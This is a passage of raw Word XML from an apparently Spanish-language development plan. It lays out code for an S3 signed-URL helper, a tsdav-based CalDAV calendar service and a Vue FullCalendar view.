        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:br/>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getSignedUrl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(fid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expiresIn</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getSignedUrl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(s3</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GetObjectCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ Bucket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> BUCKET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fid })</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { expiresIn })</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="193"/>
    <w:bookmarkEnd w:id="194"/>
    <w:bookmarkStart w:id="197" w:name="fase-5-calendario-semana-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.5 Fase 5: Calendario (Semana 5)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="195" w:name="tsdav-auto-discovery-y-crud"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.5.1 tsdav: Auto-Discovery y CRUD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/services/caldav.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { createDAVClient } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'tsdav'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { AuthService } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./auth.js'</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AccountDoc } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../types/index.js'</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CalDAVService {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">getClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AccountDoc) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> creds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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      AuthService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">decryptCredentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">credentialsEncrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">credentialsIv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">credentialsTag</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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createDAVClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      serverUrl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`https://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">imapHost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> creds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      authMethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Basic'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      defaultAccountType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'caldav'</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listCalendars</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AccountDoc) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>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getClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>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login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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fetchCalendars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listEvents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AccountDoc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> calendarUrl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timeRange</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { start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getClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>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login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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fetchCalendarObjects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      calendar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> calendarUrl }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      timeRange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createEvent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AccountDoc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> calendarUrl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iCalString</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getClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>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login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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createCalendarObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      calendar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> calendarUrl }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      filename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crypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">randomUUID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.ics`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      iCalString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195"/>
    <w:bookmarkStart w:id="196" w:name="fullcalendar-díasemanames"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.5.2 FullCalendar: Día/Semana/Mes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- packages/web/src/views/CalendarView.vue --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;template&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;div class="h-full flex flex-col"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;FullCalendar</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      :options="calendarOptions"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      class="flex-1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/template&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script setup lang="ts"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import FullCalendar from '@fullcalendar/vue3';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import dayGridPlugin from '@fullcalendar/daygrid';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import timeGridPlugin from '@fullcalendar/timegrid';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import interactionPlugin from '@fullcalendar/interaction';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ref } from 'vue';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">const calendarOptions = ref({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  plugins: [dayGridPlugin, timeGridPlugin, interactionPlugin],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  initialView: 'timeGridWeek',</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  headerToolbar: {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    left: 'prev,next today',</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    center: 'title',</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    right: 'dayGridMonth,timeGridWeek,timeGridDay',</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  editable: true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  selectable: true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  selectMirror: true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  dayMaxEvents: true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
